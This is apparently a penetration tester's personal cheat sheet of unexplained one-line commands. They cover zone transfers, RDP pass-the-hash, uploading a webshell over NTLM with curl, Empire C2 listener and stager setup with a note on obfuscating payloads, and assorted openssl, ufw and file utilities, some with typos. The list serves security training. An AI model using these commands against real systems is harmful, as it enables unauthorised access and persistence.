======
ls /usr/share/webshells/
searchsploit -x 34451
searchsploit -m 31337
searchsploit --colour -t php 5.X | grep -vi .php | head
dig axfr <domain> @<dns-server>
nmap --script=dns-zone-transfer -p 53 ns2.domain.com
host -l domain namesvr
rdesktop -u offsec -p password <ip-address> -r disk:home=/root
xfreerdp /clipboard /v:mycomputer.mydomain.local /port:3389 /u:myuser /d:mydomain.local /p:mypass /size:1600*1000
rdesktop -u offsec -p password <ip-address> -r disk:home=/root
xfreerdp /u:uffsec /d:win2012 /pth:--HASH-- /v:10.1.1.1
nmtui
node -e "console.log('hello')"
node script.js
mount -t davfs -o noexec http://example.com/webdav/ /mnt/webdav
echo -e "/mtn/webdav myUser P@ssw0rd" | tee -a /etc/davfs2/secrets
guestmount -a /path/to/test.vmdk -i --ro /mnt/diskmnt
cewl https://target.com/ -w outfile.txt -d 4 -m 7
curl --ntlm -u domain\myUser:P@ssw0rd\? -T shell.php http://example.com:8080/shell.php
uselistener http
How often does a beacon phone home?
What the base command looks like
Server-side headers presented by the server
Web proxy-related settings
usestager multi/launcher
assorted string manipulation to obfuscate signature-based analysis of payloads.
interact AGENTID
shell ipconfig
openssl enc -d -nosalt -nopad -aes-256-cbc -K "A4D350E68EED39C72CEA5585464789E160B5C5782FDD28A7D2D227F40D7B76E4" -iv '1BD487C6AC68570040CCB900EA9FED05' -in wonkatania.enc -out wonkatania.txt -k "Pure Imagination"
openssl s_client -connect hooperlabs.xyz:443 -cipher EXP-RC4-MD5
openssl enc -d base64 -in file.b64 -out file.txt
openssl enc aes -k deadlist -in file.txt -out file.enc
openssl dgst -sha1 file.txt
openssl enc -aes-128-ecb -e -in logo.rgba -out logo-ecb.rgba -pass pass:deadlist
openssl enc -aes-128-cbc -k pass -p -in file1 -out file1.enc
openssl x509 -in cert.crt -text
openssl pkcs12 -in file.pfx -clcerts -nokeys -out cert.crt
openssl pkcs12 -in file.pfx -nocerts -out key.pem
ufw status numbered
ufw delete 1
uwf add allow 80:80/tcp
perl -MCPAN -e 'install NetPacket::IP'
open($FILE, ">name_of_file");
close($FILE);
print($FILE $file-content.$more_file_content); #
my $variable = "poop";
payload += struct.pack("<I", 0x019F6940) #
convert -depth 32 logo.png logo.rgba
convert -size $(identify logo.png | cut -f 3 -d ' ' ) -depth 32 logo-ecb.rgba logo-ecb.png
exiftool -Comment='mycomment' index.jpeg
dd if=/dev/zero of=file2 bs=1 count=100 seek=1111